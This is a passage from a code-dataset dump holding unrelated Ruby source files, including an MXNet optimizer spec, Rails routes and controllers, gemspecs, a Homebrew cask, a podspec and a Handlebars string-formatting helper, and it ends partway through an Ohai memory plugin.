hexsha (stringlengths: 40-40) | size (int64: 2-1.01M) | content (stringlengths: 2-1.01M) | avg_line_length (float64: 1.5-100) | max_line_length (int64: 2-1k) | alphanum_fraction (float64: 0.25-1)
---|---|---|---|---|---
1c27640c3b3832192686665a5f5385e151b7f38a | 4,113 | require 'spec_helper'
RSpec.describe MXNet::Optimizer do
describe '.create' do
it 'does not accept a class' do
expect {
MXNet::Optimizer.create(MXNet::Optimizer::SGD)
}.to raise_error(ArgumentError)
end
it 'accepts an instance' do
opt = MXNet::Optimizer.create(MXNet::Optimizer::SGD.new)
expect(opt).to be_a(MXNet::Optimizer::SGD)
end
it 'accepts a string' do
opt = MXNet::Optimizer.create('sgd')
expect(opt).to be_a(MXNet::Optimizer::SGD)
end
it 'accepts a symbol' do
opt = MXNet::Optimizer.create(:sgd)
expect(opt).to be_a(MXNet::Optimizer::SGD)
end
end
end
RSpec.describe MXNet::Optimizer::Base do
describe '#learning_rate' do
it 'is changed by #learning_rate=' do
o1 = MXNet::Optimizer::Base.new(learning_rate: 0.01)
o1.learning_rate = 0.2
expect(o1.learning_rate).to eq(0.2)
end
it 'is affected by lr_scheduler' do
lr_s = MXNet::LRScheduler::FactorScheduler.new(step: 1)
o2 = MXNet::Optimizer::Base.new(lr_scheduler: lr_s, learning_rate: 0.3)
expect(o2.learning_rate).to eq(0.3)
o2.lr_scheduler.base_lr = 0.4
expect(o2.learning_rate).to eq(0.4)
end
end
describe '#learning_rate=' do
it 'raises RuntimeError if lr_scheduler is given' do
lr_s = MXNet::LRScheduler::FactorScheduler.new(step: 1)
o = MXNet::Optimizer::Base.new(lr_scheduler: lr_s, learning_rate: 0.3)
expect { o.learning_rate = 0.5 }.to raise_error(RuntimeError)
end
end
describe '#lr_mult' do
specify do
o = MXNet::Optimizer::Base.new
# TODO: add expectations for the lr_mult reader
end
end
describe '#lr_mult=' do
specify do
o = MXNet::Optimizer::Base.new
# TODO: add expectations for the lr_mult writer
end
end
describe '#wd_mult=' do
# TODO: add examples for the wd_mult writer
end
describe 'lr_mult and wd_mult' do
xspecify do
data = MXNet::Symbol.var(:data)
bias = MXNet::Symbol.var(:fc1_bias, lr_mult: 1.0)
fc1 = MXNet::Symbol.FullyConnected(data: data, bias: bias, name: :fc1, num_hidden: 10, lr_mult: 0)
fc2 = MXNet::Symbol.FullyConnected(data: fc1, name: :fc2, num_hidden: 10, wd_mult: 0.5)
mod = MXNet::Module.new(symbol: fc2, label_names: nil, context: MXNet.default_context)
mod.bind(data_shapes: [[:data, [5, 10]]])
mod.init_params(init: MXNet::Init::Uniform.new(1.0))
mod.init_optimizer(optimizer_params: {learning_rate: 1.0})
args1, _ = mod.get_params
args1.transform_values!(&:to_narray)
mod.forward(MXNet::IO::DataBatch.new(data: [MXNet::Random::Uniform.new(low: -1.0, high: 1.0, shape: [5, 10])], label: nil), is_train: true)
mod.backward(mod.get_outputs)
mod.update
args2, _ = mod.get_params
args2.transform_values!(&:to_narray)
expect(mod.optimizer.lr_mult).to include(fc1_bias: 1.0, fc1_weight: 0.0)
expect(mod.optimizer.wd_mult).to include(fc2_bias: 0.5, fc2_weight: 0.5, fc1_bias: 0.0)
expect((args1[:fc1_weight] - args2[:fc1_weight]).abs.max).to be <= 1e-10
expect((args1[:fc1_bias] - args2[:fc1_bias]).abs.max).not_to be <= 1e-1
expect((args1[:fc2_weight] - args2[:fc2_weight]).abs.max).not_to be <= 1e-1
end
end
end
RSpec.describe MXNet::Optimizer::SGD do
context 'with lr_scheduler' do
specify do
opt = MXNet::Optimizer::SGD.new(
momentum: 0.9,
learning_rate: 0.1,
lr_scheduler: MXNet::LRScheduler::FactorScheduler.new(step: 10, factor: 0.2)
)
expect(opt.learning_rate).to eq(0.1)
expect { opt.learning_rate = 0.02 }.to raise_error(RuntimeError)
end
end
describe '#update' do
let(:optimizer) do
MXNet::Optimizer::SGD.new(learning_rate: 0.1)
end
it 'updates the weight' do
weight = MXNet::NDArray.array([1])
gradient = MXNet::NDArray.array([0.5])
optimizer.update(0, weight, gradient, nil)
expect(weight.as_scalar).to be_within(0.01).of(0.95)
end
end
end
RSpec.xdescribe 'Sparse SGD' # TODO:
RSpec.xdescribe 'FTML' # TODO:
RSpec.xdescribe 'ADAM' # TODO:
RSpec.xdescribe 'Signum' # TODO:
RSpec.xdescribe 'RMSProp' # TODO:
RSpec.xdescribe 'Ftrl' # TODO:
RSpec.xdescribe 'NADAM' # TODO:
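# Illustrative usage sketch (not part of the original spec suite): the plain API
# flow exercised by the '#update' example above. Assumes the mxnet gem and a
# working native libmxnet are installed; guarded so it never runs under rspec.
if $PROGRAM_NAME == __FILE__
optimizer = MXNet::Optimizer.create(:sgd)   # factory accepts a Symbol, as specced above
optimizer.learning_rate = 0.1               # plain writer works when no lr_scheduler is set
weight   = MXNet::NDArray.array([1])
gradient = MXNet::NDArray.array([0.5])
optimizer.update(0, weight, gradient, nil)  # SGD step: 1 - 0.1 * 0.5
puts weight.as_scalar                       # ~0.95
end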
| 32.132813 | 145 | 0.653781 |
bf87d5f1d455f3e8ec3c3327b462db7eaae880a4 | 1,874 | # encoding: utf-8
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# /spec/fixtures/responses/whois.co.ug/status_registered.expected
#
# and regenerate the tests with the following rake task
#
# $ rake genspec:parsers
#
require 'spec_helper'
require 'whois/record/parser/whois.co.ug.rb'
describe Whois::Record::Parser::WhoisCoUg, "status_registered.expected" do
before(:each) do
file = fixture("responses", "whois.co.ug/status_registered.txt")
part = Whois::Record::Part.new(:body => File.read(file))
@parser = klass.new(part)
end
context "#status" do
it do
@parser.status.should == :registered
end
end
context "#available?" do
it do
@parser.available?.should == false
end
end
context "#registered?" do
it do
@parser.registered?.should == true
end
end
context "#created_on" do
it do
@parser.created_on.should be_a(Time)
@parser.created_on.should == Time.parse("2001-04-02 00:00:00")
end
end
context "#updated_on" do
it do
@parser.updated_on.should be_a(Time)
@parser.updated_on.should == Time.parse("2009-11-10 14:06:58 UTC")
end
end
context "#expires_on" do
it do
@parser.expires_on.should be_a(Time)
@parser.expires_on.should == Time.parse("2018-04-07 00:00:00")
end
end
context "#nameservers" do
it do
@parser.nameservers.should be_a(Array)
@parser.nameservers.should have(3).items
@parser.nameservers[0].should be_a(_nameserver)
@parser.nameservers[0].name.should == "ns1.cfi.co.ug"
@parser.nameservers[1].should be_a(_nameserver)
@parser.nameservers[1].name.should == "ns2.cfi.co.ug"
@parser.nameservers[2].should be_a(_nameserver)
@parser.nameservers[2].name.should == "ns3.cfi.co.ug"
end
end
end
| 26.771429 | 74 | 0.667556 |
5d8d666ae26ca1a83c599f430ee935bde41eebb8 | 456 | class AircraftsController < ApplicationController
def index
aircrafts = Aircraft.all
if aircrafts
render json: AircraftSerializer.new(aircrafts)
else
render json: {message: 'No aircrafts found'}
end
end
def show
aircraft = Aircraft.find_by(id: params[:id])
if aircraft
render json: AircraftSerializer.new(aircraft)
else
render json: {message: 'No aircraft found with that id'}
end
end
end
| 22.8 | 62 | 0.682018 |
bf0ee566117b0e8f9fcb8ab0d48972aac5eed682 | 1,253 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/enums/search_engine_results_page_type.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/enums/search_engine_results_page_type.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum" do
end
add_enum "google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum.SearchEngineResultsPageType" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :ADS_ONLY, 2
value :ORGANIC_ONLY, 3
value :ADS_AND_ORGANIC, 4
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Enums
SearchEngineResultsPageTypeEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum").msgclass
SearchEngineResultsPageTypeEnum::SearchEngineResultsPageType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum.SearchEngineResultsPageType").enummodule
end
end
end
end
end
| 37.969697 | 233 | 0.769354 |
f7edac462ef3caa451dde5b90c0c32592abcc9fb | 439 | ENV['RAILS_ENV'] ||= 'test'
require_relative "../config/environment"
require "rails/test_help"
require "minitest/reporters"
Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Add more helper methods to be used by all tests here...
end
| 29.266667 | 82 | 0.763098 |
ed35f13162e33318e910f379353d24c067893e2b | 46 | module MethodFallback
VERSION = '0.1.2'
end
| 11.5 | 21 | 0.717391 |
261531041be37c56e007c4be31d7f9c037858742 | 1,198 |
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'gbeacon/version'
Gem::Specification.new do |spec|
spec.name = 'gbeacon'
spec.version = Gbeacon::VERSION
spec.authors = ['Marlon Henry Schweigert']
spec.email = ['[email protected]']
spec.summary = 'Grafana beacon'
spec.description = 'Grafana beacon'
spec.homepage = 'http://www.github.com/schweigert/grafana-beacon'
spec.license = 'MIT'
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = 'cmd'
spec.executables = ['gbeacon.rb']
spec.require_paths = ['lib']
spec.add_dependency 'graphite-api', '~> 0.1.6'
spec.add_dependency 'usagewatch_ext', '~> 0.2.1'
spec.add_development_dependency 'bundler', '~> 1.16'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.0'
end
| 36.30303 | 87 | 0.653589 |
91b230311343c0b682d61439f0275cd33e092979 | 420 | require "rails_helper"
feature "Handling Forbidden responses from the backend", type: :feature do
let(:forbidden_page) { PageObjects::Page::Forbidden.new }
before do
signed_in_user
stub_api_v2_request("/recruitment_cycles/#{Settings.current_cycle}", "", :get, 403)
end
it "Renders the forbidden page" do
visit "/organisations/A0/"
expect(forbidden_page.forbidden_text).to be_visible
end
end
| 26.25 | 87 | 0.740476 |
e2860ac7b07c8e6a8b91a87e37605dbcf2c569fa | 1,293 | cask 'amethyst' do
if MacOS.version <= :mavericks
version '0.9.10'
sha256 '82adf42ce6031ab59a3072e607788e73f594ad5f21c7118aabc6c5dafe3d0b47'
url "https://ianyh.com/amethyst/versions/Amethyst-#{version}.zip"
elsif MacOS.version <= :el_capitan
version '0.10.1'
sha256 '9fd1ac2cfb8159b2945a4482046ee6d365353df617f4edbabc4e8cadc448c1e7'
url "https://ianyh.com/amethyst/versions/Amethyst-#{version}.zip"
else
version '0.13.0'
sha256 '18fd9d2f6da33fd854668f315ee753ebb819219dd4f3b67387a1653252acbd30'
# github.com/ianyh/Amethyst was verified as official when first introduced to the cask
url "https://github.com/ianyh/Amethyst/releases/download/v#{version}/Amethyst.zip"
end
appcast 'https://ianyh.com/amethyst/appcast.xml'
name 'Amethyst'
homepage 'https://ianyh.com/amethyst/'
auto_updates true
app 'Amethyst.app'
uninstall login_item: 'Amethyst'
zap trash: [
'~/Library/Caches/com.amethyst.Amethyst',
'~/Library/Preferences/com.amethyst.Amethyst.plist',
'~/Library/Cookies/com.amethyst.Amethyst.binarycookies',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.amethyst.amethyst.sfl*',
]
end
| 38.029412 | 153 | 0.723898 |
61a604b954f773ae85d8287e7dee54f51df14a9a | 7,556 | require 'sidekiq/web'
Gitlab::Application.routes.draw do
#
# Search
#
get 'search' => "search#show"
# API
require 'api'
Gitlab::API.logger Rails.logger
mount Gitlab::API => '/api'
constraint = lambda { |request| request.env["warden"].authenticate? and request.env['warden'].user.admin? }
constraints constraint do
mount Sidekiq::Web, at: "/admin/sidekiq", as: :sidekiq
end
# Enable Grack support
mount Grack::Bundle.new({
git_path: Gitlab.config.git.bin_path,
project_root: Gitlab.config.gitlab_shell.repos_path,
upload_pack: Gitlab.config.gitlab_shell.upload_pack,
receive_pack: Gitlab.config.gitlab_shell.receive_pack
}), at: '/', constraints: lambda { |request| /[-\/\w\.]+\.git\//.match(request.path_info) }
#
# Help
#
get 'help' => 'help#index'
get 'help/api' => 'help#api'
get 'help/markdown' => 'help#markdown'
get 'help/permissions' => 'help#permissions'
get 'help/public_access' => 'help#public_access'
get 'help/raketasks' => 'help#raketasks'
get 'help/ssh' => 'help#ssh'
get 'help/system_hooks' => 'help#system_hooks'
get 'help/web_hooks' => 'help#web_hooks'
get 'help/workflow' => 'help#workflow'
#
# Public namespace
#
namespace :public do
resources :projects, only: [:index]
root to: "projects#index"
end
#
# Attachments serving
#
get 'files/:type/:id/:filename' => 'files#download', constraints: { id: /\d+/, type: /[a-z]+/, filename: /.+/ }
#
# Admin Area
#
namespace :admin do
resources :users, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ } do
member do
put :team_update
put :block
put :unblock
end
end
resources :groups, constraints: { id: /[^\/]+/ } do
member do
put :project_update
put :project_teams_update
delete :remove_project
end
end
resources :teams, constraints: { id: /[^\/]+/ } do
scope module: :teams do
resources :members, only: [:edit, :update, :destroy, :new, :create]
resources :projects, only: [:edit, :update, :destroy, :new, :create], constraints: { id: /[a-zA-Z.\/0-9_\-]+/ }
end
end
resources :hooks, only: [:index, :create, :destroy] do
get :test
end
resource :logs, only: [:show]
resource :resque, controller: 'resque', only: [:show]
resources :projects, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ }, only: [:index, :show] do
scope module: :projects, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ } do
resources :members, only: [:edit, :update, :destroy]
end
end
root to: "dashboard#index"
end
get "errors/githost"
#
# Profile Area
#
resource :profile, only: [:show, :update] do
member do
get :account
get :history
get :token
get :design
put :update_password
put :reset_private_token
put :update_username
end
resource :notifications
end
resources :keys
match "/u/:username" => "users#show", as: :user, constraints: { username: /.*/ }
#
# Dashboard Area
#
resource :dashboard, controller: "dashboard" do
member do
get :projects
get :issues
get :merge_requests
end
end
#
# Groups Area
#
resources :groups, constraints: {id: /(?:[^.]|\.(?!atom$))+/, format: /atom/} do
member do
get :issues
get :merge_requests
get :search
get :people
post :team_members
end
end
#
# Teams Area
#
resources :teams, constraints: {id: /(?:[^.]|\.(?!atom$))+/, format: /atom/} do
member do
get :issues
get :merge_requests
end
scope module: :teams do
resources :members, only: [:index, :new, :create, :edit, :update, :destroy]
resources :projects, only: [:index, :new, :create, :edit, :update, :destroy], constraints: { id: /[a-zA-Z.0-9_\-\/]+/ }
end
end
resources :projects, constraints: { id: /[^\/]+/ }, only: [:new, :create]
devise_for :users, controllers: { omniauth_callbacks: :omniauth_callbacks, registrations: :registrations }
#
# Project Area
#
resources :projects, constraints: { id: /(?:[a-zA-Z.0-9_\-]+\/)?[a-zA-Z.0-9_\-]+/ }, except: [:new, :create, :index], path: "/" do
member do
put :transfer
end
resources :blob, only: [:show], constraints: {id: /.+/}
resources :tree, only: [:show], constraints: {id: /.+/, format: /(html|js)/ }
resources :edit_tree, only: [:show, :update], constraints: {id: /.+/}, path: 'edit'
resources :commit, only: [:show], constraints: {id: /[[:alnum:]]{6,40}/}
resources :commits, only: [:show], constraints: {id: /(?:[^.]|\.(?!atom$))+/, format: /atom/}
resources :compare, only: [:index, :create]
resources :blame, only: [:show], constraints: {id: /.+/}
resources :graph, only: [:show], constraints: {id: /(?:[^.]|\.(?!json$))+/, format: /json/}
match "/compare/:from...:to" => "compare#show", as: "compare",
:via => [:get, :post], constraints: {from: /.+/, to: /.+/}
resources :wikis, only: [:show, :edit, :destroy, :create] do
collection do
get :pages
put ':id' => 'wikis#update'
get :git_access
end
member do
get "history"
end
end
resource :wall, only: [:show] do
member do
get 'notes'
end
end
resource :repository do
member do
get "branches"
get "tags"
get "stats"
get "archive"
end
end
resources :services, constraints: { id: /[^\/]+/ }, only: [:index, :edit, :update] do
member do
get :test
end
end
resources :deploy_keys
resources :protected_branches, only: [:index, :create, :destroy]
resources :refs, only: [] do
collection do
get "switch"
end
member do
# tree viewer logs
get "logs_tree", constraints: { id: /[a-zA-Z.\/0-9_\-]+/ }
get "logs_tree/:path" => "refs#logs_tree",
as: :logs_file,
constraints: {
id: /[a-zA-Z.0-9\/_\-]+/,
path: /.*/
}
end
end
resources :merge_requests, constraints: {id: /\d+/}, except: [:destroy] do
member do
get :diffs
get :automerge
get :automerge_check
get :ci_status
end
collection do
get :branch_from
get :branch_to
end
end
resources :snippets do
member do
get "raw"
end
end
resources :hooks, only: [:index, :create, :destroy] do
member do
get :test
end
end
resources :team, controller: 'team_members', only: [:index]
resources :milestones, except: [:destroy]
resources :labels, only: [:index]
resources :issues, except: [:destroy] do
collection do
post :sort
post :bulk_update
get :search
end
end
resources :team_members do
collection do
# Used for import team
# from another project
get :import
post :apply_import
end
end
scope module: :projects do
resources :teams, only: [] do
collection do
get :available
post :assign
end
member do
delete :resign
end
end
end
resources :notes, only: [:index, :create, :destroy] do
collection do
post :preview
end
end
end
root to: "dashboard#show"
end
| 24.77377 | 132 | 0.560349 |
1c2444e839beaf7865c3e4fad27fcc27aff7a511 | 2,515 | Rails.application.routes.draw do
resource :profile, only: [:show, :edit, :update]
resources :donations, only: [:edit, :update] do
resource :confirmation, only: [:create, :destroy, :update]
end
resource :location, only: [:update]
resources :pre_registrations, only: [:create]
resources :zones, only: [] do
resources :registrations, only: [:create, :new]
resources :subscriptions, only: [:create, :new]
end
resources :passwords, controller: "clearance/passwords", only: [:create, :new]
resource :session, controller: "clearance/sessions", only: [:create]
resources :users, controller: "users", only: [:create] do
resource :password,
controller: "clearance/passwords",
only: [:create, :edit, :update]
end
get "/sign_in" => "clearance/sessions#new", as: "sign_in"
delete "/sign_out" => "clearance/sessions#destroy", as: "sign_out"
get "/pages/*id" => 'pages#show', as: :page, format: false
constraints Clearance::Constraints::SignedIn.new(&:regional_admin?) do
resources :cyclist_invitations, only: [:new, :create, :show]
resources :donors, only: [:show]
resources :users, only: [:index, :destroy] do
resource :promotion, only: [:create, :destroy]
end
resources :zones, only: [:create, :index, :new, :show, :edit, :update] do
resources(
:scheduled_pickups,
path: :donations,
only: [:edit, :show, :new, :create, :update],
)
end
resources :regions, only: [:create, :destroy, :index, :new, :show] do
resources(
:zones,
only: [:create, :destroy, :new],
controller: :region_zones
)
end
resources :region_admins, only: [:new, :create, :destroy]
get "/" => redirect("/zones")
end
constraints Clearance::Constraints::SignedIn.new(&:staff?) do
resources :donations, only: [:show] do
resource :pickup, only: [:update, :destroy]
end
resources :subscriptions, only: [:index]
resources :zones, only: [] do
resources(
:scheduled_pickups,
path: :donations,
only: [],
) do
resource :checklist, only: [:show], controller: :pickup_checklists
end
end
end
constraints Clearance::Constraints::SignedIn.new(&:cyclist?) do
get "/" => "latest_pickup_checklists#show"
end
constraints Clearance::Constraints::SignedIn.new do
get "/" => redirect("/profile")
end
constraints Clearance::Constraints::SignedOut.new do
root to: "marketing#index"
end
end
| 29.940476 | 80 | 0.638569 |
030efd6cfd21e4efee8438a783d5b2ff6bc07fce | 2,584 | Pod::Spec.new do |s|
s.name = "MatrixSDK"
s.version = "0.22.5"
s.summary = "The iOS SDK to build apps compatible with Matrix (https://www.matrix.org)"
s.description = <<-DESC
Matrix is a new open standard for interoperable Instant Messaging and VoIP, providing pragmatic HTTP APIs and open source reference implementations for creating and running your own real-time communication infrastructure.
Our hope is to make VoIP/IM as universal and interoperable as email.
DESC
s.homepage = "https://www.matrix.org"
s.license = { :type => "Apache License, Version 2.0", :file => "LICENSE" }
s.author = { "matrix.org" => "[email protected]" }
s.social_media_url = "http://twitter.com/matrixdotorg"
s.source = { :git => "https://github.com/matrix-org/matrix-ios-sdk.git", :tag => "v#{s.version}" }
s.requires_arc = true
s.swift_versions = ['5.1', '5.2']
s.ios.deployment_target = "10.0"
s.osx.deployment_target = "10.12"
s.default_subspec = 'Core'
s.subspec 'Core' do |ss|
ss.ios.deployment_target = "10.0"
ss.osx.deployment_target = "10.12"
ss.source_files = "MatrixSDK", "MatrixSDK/**/*.{h,m}", "MatrixSDK/**/*.{swift}"
ss.osx.exclude_files = "MatrixSDK/VoIP/MXiOSAudioOutputRoute*.swift"
ss.private_header_files = ['MatrixSDK/MatrixSDKSwiftHeader.h', "MatrixSDK/**/*_Private.h"]
ss.resources = "MatrixSDK/**/*.{xcdatamodeld}"
ss.frameworks = "CoreData"
ss.dependency 'AFNetworking', '~> 4.0.0'
ss.dependency 'GZIP', '~> 1.3.0'
ss.dependency 'SwiftyBeaver', '1.9.5'
# Requirements for e2e encryption
ss.dependency 'OLMKit', '~> 3.2.5'
ss.dependency 'Realm', '10.16.0'
ss.dependency 'libbase58', '~> 0.1.4'
end
s.subspec 'JingleCallStack' do |ss|
ss.ios.deployment_target = "11.0"
ss.source_files = "MatrixSDKExtensions/VoIP/Jingle/**/*.{h,m}"
ss.dependency 'MatrixSDK/Core'
# The Google WebRTC stack
# Note: it is disabled because its framework does not embed x86 build which
# prevents us from submitting the MatrixSDK pod
#ss.ios.dependency 'GoogleWebRTC', '~>1.1.21820'
# Use WebRTC framework included in Jitsi Meet SDK
ss.ios.dependency 'JitsiMeetSDK', '3.10.2'
# JitsiMeetSDK has not yet binaries for arm64 simulator
ss.pod_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
ss.user_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
end
end
| 36.394366 | 228 | 0.642028 |
5db05865ea57ec93f706e129309f5098e9421034 | 1,040 | # frozen_string_literal: true
require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
setup do
@user = users(:one)
end
test 'should get index' do
get users_url
assert_response :success
end
test 'should get new' do
get new_user_url
assert_response :success
end
test 'should create user' do
assert_difference('User.count') do
post users_url, params: { user: { email: @user.email, name: @user.name } }
end
assert_redirected_to user_url(User.last)
end
test 'should show user' do
get user_url(@user)
assert_response :success
end
test 'should get edit' do
get edit_user_url(@user)
assert_response :success
end
test 'should update user' do
patch user_url(@user), params: { user: { email: @user.email, name: @user.name } }
assert_redirected_to user_url(@user)
end
test 'should destroy user' do
assert_difference('User.count', -1) do
delete user_url(@user)
end
assert_redirected_to users_url
end
end
| 20.392157 | 85 | 0.688462 |
bb1929c00c1e655d4a70e3c227f62594d0b9a526 | 1,441 | # typed: false
require 'spec_helper'
require 'ddtrace/transport/io'
RSpec.describe Datadog::Transport::IO do
describe '.new' do
subject(:new_io) { described_class.new(out, encoder) }
let(:out) { instance_double(IO) }
let(:encoder) { instance_double(Datadog::Core::Encoding::Encoder) }
let(:client) { instance_double(Datadog::Transport::IO::Client) }
before do
expect(Datadog::Transport::IO::Client).to receive(:new)
.with(out, encoder)
.and_return(client)
end
it { is_expected.to be client }
end
describe '.default' do
let(:client) { instance_double(Datadog::Transport::IO::Client) }
context 'given no options' do
subject(:default) { described_class.default }
before do
expect(Datadog::Transport::IO::Client).to receive(:new)
.with($stdout, Datadog::Core::Encoding::JSONEncoder)
.and_return(client)
end
it { is_expected.to be client }
end
context 'given overrides' do
subject(:default) { described_class.default(options) }
let(:options) { { out: out, encoder: encoder } }
let(:out) { instance_double(IO) }
let(:encoder) { instance_double(Datadog::Core::Encoding::Encoder) }
before do
expect(Datadog::Transport::IO::Client).to receive(:new)
.with(out, encoder)
.and_return(client)
end
it { is_expected.to be client }
end
end
end
| 26.2 | 73 | 0.634976 |
bbb8a6d195e04caaf36ca47036435f40195d29bf | 6,696 | # Klue-Less DDD generator
module KDsl
module TemplateRendering
# https://api.rubyonrails.org/classes/ActiveSupport/Inflector.html#method-i-humanize
class HandlebarsFormatter
# ----------------------------------------------------------------------
# format symbols
# ----------------------------------------------------------------------
# TODO
def self.format_as(value, formats: [])
formats.each do |format|
value = format(value, format)
end
value
end
# TODO
def self.format(value, format = nil)
case format.to_s.to_sym
when :snake
return snake(value)
when :dashify, :dasherize
return dashify(value)
when :camel, :camelU, :camelUpper
return camel(value)
when :lamel, :camelL, :camelLower
return lamel(value)
when :titleize
return titleize(value)
when :humanize
return humanize(value)
when :constant, :constantize
return constantize(value)
when :pluralize
return pluralize(value)
when :slash, :slash_forward, :forward_slash
return slash(value)
when :slash_back, :back_slash, :backward_slash, :slash_backward
return back_slash(value)
when :double_colon, :namespace
return double_colon(value)
end
value
end
def self.snake(value)
value = value.to_s
value.parameterize.underscore
end
def self.slash(value)
value = value.to_s
value.parameterize(preserve_case: true).dasherize.gsub('-', '/')
end
def self.back_slash(value)
value = value.to_s
value.parameterize(preserve_case: true).dasherize.gsub('-', '\\')
end
def self.double_colon(value)
value = value.to_s
value.parameterize(preserve_case: true).dasherize.gsub('-', '::')
end
def self.dashify(value)
value = value.to_s
value.parameterize.dasherize
end
def self.camel(value)
value = value.to_s
value.parameterize.underscore.camelize
end
def self.lamel(value)
value = value.to_s
value.parameterize.underscore.camelize(:lower)
end
def self.titleize(value)
value = value.to_s
value.parameterize.underscore.titleize
end
def self.humanize(value)
value = value.to_s
value.parameterize.underscore.humanize
end
def self.constantize(value)
value = value.to_s
snake(value).upcase
end
def self.pluralize(value)
value = value.to_s
value.pluralize
end
# ----------------------------------------------------------------------
# format symbols
# ----------------------------------------------------------------------
# default
def self.default(value, default_value)
# L.kv 'value', value
# L.kv 'default_value', default_value
value || default_value
end
# Pad Right
def self.padr(value, count = nil)
# L.kv 'value', value
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 30
value = '' if value.nil?
value.ljust(count)
end
# Pad Left
def self.padl(value, count = nil)
# L.kv 'value', value
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 30
value = '' if value.nil?
value.rjust(count)
end
# STRING CASE
# &
# STRING
def self.surround_if_value(value, prepend, append, format = :none)
# L.kv 'value', value
# L.kv 'prepend', prepend
# L.kv 'format', format
value.present? ? "#{prepend}#{format(value, format)}#{append}" : ''
end
# STRING CASE
# &
# STRING
# prepend_if_value - will prepend a prepend to a value if the value is not empty
def self.prepend_if_value(value, prepend, format = :none)
# L.kv 'value', value
# L.kv 'prepend', prepend
# L.kv 'format', format
value.present? ? "#{prepend}#{format(value, format)}" : ''
end
# append_if_value - will add a append to a value if the value is not empty
def self.append_if_value(value, append, format = :none)
# L.kv 'value', value
# L.kv 'default_value', default_value
value.present? ? "#{format(value, format)}#{append}" : ''
end
# STRING
# append_if_value - will add a append to a value if the value is not empty
def self.repeat(count, value = ' ')
# L.kv 'value', value
# L.kv 'count', count
value * count
end
# STRING (LINE_HASH LINE_DASH LINE_UNDERSCORE)
# hash
def self.hash(count = 1)
# L.kv 'count', count.class.name
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 1
'#' * count
end
# TEMPLATE
# curly_open
def self.curly_open(count = 1)
# L.kv 'count', count.class.name
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 1
'{' * count
end
# curly_close
def self.curly_close(count = 1)
# L.kv 'count', count.class.name
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 1
'}' * count
end
# ----------------------------------------------------------------------
# Logic helpers
# ----------------------------------------------------------------------
def self.or(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs || rhs
end
def self.and(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs && rhs
end
def self.eq(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs == rhs
end
def self.ne(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs != rhs
end
def self.lt(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs < rhs
end
def self.gt(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs > rhs
end
def self.lte(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs <= rhs
end
def self.gte(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs >= rhs
end
end
end
end
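# Illustrative usage sketch (not part of the original file): exercises a few of
# the helpers above. Assumes ActiveSupport's String core extensions
# (parameterize/underscore/camelize/pluralize) are loaded, as the class relies on them.
if $PROGRAM_NAME == __FILE__
formatter = KDsl::TemplateRendering::HandlebarsFormatter
puts formatter.format('Customer Order', :snake)                            # => "customer_order"
puts formatter.format('Customer Order', :camel)                            # => "CustomerOrder"
puts formatter.format_as('Customer Order', formats: [:snake, :pluralize])  # => "customer_orders"
puts formatter.padr('name', 10) + '|'                                      # => "name      |"
end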
| 25.172932 | 88 | 0.497909 |
2878752636aa0d1b9f131c2dc8fd94dbe0d9fd5b | 2,412 | #
# Author:: Bryan McLellan ([email protected])
# Copyright:: Copyright (c) 2009 Bryan McLellan
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
Ohai.plugin(:Memory) do
provides "memory", "memory/swap"
collect_data(:dragonflybsd) do
memory Mash.new
memory[:swap] = Mash.new
# /usr/src/sys/sys/vmmeter.h
